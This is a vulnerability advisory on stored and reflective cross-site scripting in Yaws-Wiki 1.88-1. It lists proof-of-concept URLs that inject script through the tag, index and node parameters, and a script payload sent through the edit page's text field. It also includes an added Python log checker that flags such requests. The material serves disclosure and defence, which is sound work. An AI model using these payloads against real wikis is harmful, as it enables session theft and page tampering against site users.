securityvulns SECURITYVULNS:DOC:26059
Apr 05, 2011

Stored and Reflective XSS in Yaws-Wiki 1.88-1 (Erlang)

Software: yaws-wiki
Version affected: 1.88-1
Platform: Erlang
Homepage: http://yaws.hyber.org/
Researcher: Michael Brooks
Original Advisory: https://sitewat.ch/en/Advisory/4

Install instructions for Ubuntu:
sudo apt-get install yaws-wiki

Edit: /etc/yaws/conf.d/yaws-wiki.conf
# add this:
<server wiki>
port = 8181
listen = 0.0.0.0
docroot = /var/lib/yaws-wiki
</server>

Then restart yaws:
sudo /etc/init.d/yaws restart

Reflective XSS:
http://localhost:8181/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
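
Detection example (added here, not part of the original advisory or of yaws-wiki): a log check that flags requests to the three pages above when the reflected parameter decodes to HTML metacharacters. It assumes the access log is in Common Log Format; the sample lines are constructed, and the stored XSS below travels in a POST body, so it does not appear in this view.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint -> parameter that carries the payload in the advisory's URLs.
AFFECTED = {
    "/editTag.yaws": "tag",
    "/showOldPage.yaws": "index",
    "/allRefsToMe.yaws": "node",
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # assumed log format
HTML_META = re.compile(r"[<>\"']")  # characters that must be escaped in HTML output

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded input is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_no, path, param, decoded_value) for each flagged request."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        param = AFFECTED.get(url.path)
        if param is None:
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = decode_fully(value)
            if name == param and HTML_META.search(value):
                hits.append((line_no, url.path, name, value))
    return hits

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Apr/2011:10:00:01 +0000] "GET /showOldPage.yaws?node=home&index=3 HTTP/1.1" 200 2211',
    '192.0.2.44 - - [05/Apr/2011:10:00:07 +0000] "GET /editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 1875',
    '192.0.2.44 - - [05/Apr/2011:10:00:09 +0000] "GET /allRefsToMe.yaws?node=%253Cb%253E HTTP/1.1" 200 940',
    '192.0.2.10 - - [05/Apr/2011:10:00:12 +0000] "GET /editPage.yaws?node=home HTTP/1.1" 200 3050',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Legitimate values containing quotes will also be flagged, so treat hits as leads to review rather than confirmed attempts.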

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to XSS. This is the "text" POST variable:
<script>alert(1)</script>